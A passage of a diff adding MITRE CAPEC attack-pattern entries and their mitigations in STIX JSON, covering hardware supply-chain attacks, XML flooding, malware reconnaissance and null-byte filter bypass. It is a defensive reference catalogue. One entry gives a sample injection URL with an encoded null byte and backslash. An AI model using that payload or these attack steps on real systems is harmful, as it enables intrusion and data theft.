"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker gains access to a system integrator's documentation for the preparation of purchased systems designated for deployment at the victim's location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker's own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to an integration facility that prepares the system before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--444a2e75-60cc-457e-bba7-af35561ff6bb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--44f41ebc-0a61-4b11-89cc-ee39adc7c9df", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa96d7c5-a195-4776-8593-4c3da18a0788", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e2b7ea2-a95c-44d2-88af-b8f040f18920", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c109c7e5-daa6-42f0-81a6-5416db0cc058", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--219a5740-2430-4bff-9bab-743bd8be41d4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--47413465-eeac-49db-9632-f885ebc15e1a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--92b13ced-765d-4949-8947-7d5e45c19556", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain strong physical system access controls and monitor networks and physical facilities for insider threats.", + "id": "course-of-action--da4c5f85-68af-498c-a2cb-7dc95e9c7115", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-524-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5318f2ea-5803-44c4-883f-e69b2e824665", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da4c5f85-68af-498c-a2cb-7dc95e9c7115", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing.", + "external_references": [ + { + "external_id": "CAPEC-528", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/528.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "Network Denial of Service:Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + } + ], + "id": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XML Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.

    2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

Experiment

  1. An adversary crafts input data that may have an adverse effect on the operation of the web service when the XML data sent to the service.

Exploit

  1. Launch a resource depletion attack: The attacker delivers a large number of XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.

    2. Techniques
    Send a large number of crafted XML messages to the target URL.
", + "x_capec_extended_description": "\n XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e" + ], + "x_capec_prerequisites": [ + "The target must receive and process XML transactions.", + "An adverssary must possess the ability to generate a large amount of XML based messages to send to the target service." + ], + "x_capec_skills_required": { + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90c77905-bef0-451f-b726-1225d30da2de", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "target_ref": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56794f75-72f9-4d9c-8fe4-a17e9e46b6c5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "target_ref": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.", + "external_references": [ + { + "external_id": "CAPEC-529", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/529.html" + } + ], + "id": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Malware-Directed Internal Reconnaissance", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4", + "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have internal, logical access to the target network and system." + ], + "x_capec_resources_required": [ + "The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Medium": "The adversary must be able to obtain or develop, as well as place malicious software inside the target network/system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7dcaa766-8fbb-4cf2-9d26-1cb5b3739b11", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7d31992-837d-4b43-91fb-5fd7cffc161b", + "target_ref": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-529-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a65abf1a-adf4-4c4d-9dbb-1ad3f3be601b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "target_ref": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an adversary to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.", + "external_references": [ + { + "external_id": "CAPEC-53", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/53.html" + }, + { + "external_id": "CWE-158", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Postfix, Null Terminate, and Backslash", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A rather simple injection is possible in a URL:\n http://getAccessHostname/sekbin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here][%00][%5C]&chapter=\n This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects postfix null byte(s) followed by a backslash to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.

    2. Techniques
    Try different encodings for null such as \\0 or %00 followed by an encoding for the backslash character.

Exploit

  1. Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) followed by a backslash such that they bypass an input filter and remove data after the null byte(s) in a way that is beneficial to them.

    2. Techniques
    If the input is a directory as part of a longer file path, add a null byte(s) followed by a backslash at the end of the input to try to traverse to the given directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Null terminators are not properly handled by the filter." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.", + "id": "course-of-action--49efb31f-83a6-4f63-9415-6e82bf0893c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-53-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b7d2bed-d8be-4a5d-8206-5c90b09eb190", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49efb31f-83a6-4f63-9415-6e82bf0893c2", + "target_ref": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eebe9446-5ca8-4441-ae14-9baa42c6bf1a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "target_ref": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-530", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/530.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Paul Wagner, Combating Counterfeit Components in the DoD Supply Chain, 2015, Defence Systems Information Analysis Center", + "external_id": "REF-698", + "source_name": "reference_from_CAPEC", + "url": "https://dsiac.org/articles/combating-counterfeit-components-in-the-dod-supply-chain/" + }, + { + "description": "Ujjwal Guin, Ke Huang, Daniel DiMase, John M. Carulli, Jr., Mohammad Tehranipoor, Yiorgos Makris, Counterfeit Integrated Circuits: A Rising Threat in the Global Semiconductor Supply Chain, Proceedings of the IEEE, 2014, IEEE", + "external_id": "REF-703", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6856206" + } + ], + "id": "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Provide Counterfeit Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker's hubs at the victim's location, allowing the attacker to remotely compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target system and sub-components." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that resemble legitimate name-brand components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are various methods to detect if the component is a counterfeit. See section II of [REF-703] for many techniques.", + "id": "course-of-action--097747c2-2318-4695-a430-22b9ccc7c604", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-530-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ced38f4-66b4-44ee-9b69-f3af9ad5ee05", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--097747c2-2318-4695-a430-22b9ccc7c604", + "target_ref": "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-531", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/531.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + } + ], + "id": "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2" + ], + "x_capec_prerequisites": [ + "Physical access to the system or the integration facility where hardware components are kept." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.", + "external_references": [ + { + "external_id": "CAPEC-532", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/532.html" + }, + { + "description": "Firmware Corruption", + "external_id": "T1495", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1495" + }, + { + "description": "Pre-OS Boot:System Firmware", + "external_id": "T1542.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Altered Installed BIOS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the installed target system design.", + "Advanced knowledge about the download and update installation processes.", + "Access to the download and update system(s) used to deliver BIOS images." + ], + "x_capec_skills_required": { + "High": "Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8242d3fc-467a-44b3-9b48-fb25ab9c2f6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--44f41ebc-0a61-4b11-89cc-ee39adc7c9df", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4dba22e9-c6a9-41d4-90dc-e0f901ba07b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--558fc16d-3a30-4de8-a6a3-715da1167d64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d87ea2ec-a2a8-4154-9e21-c6527e611602", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 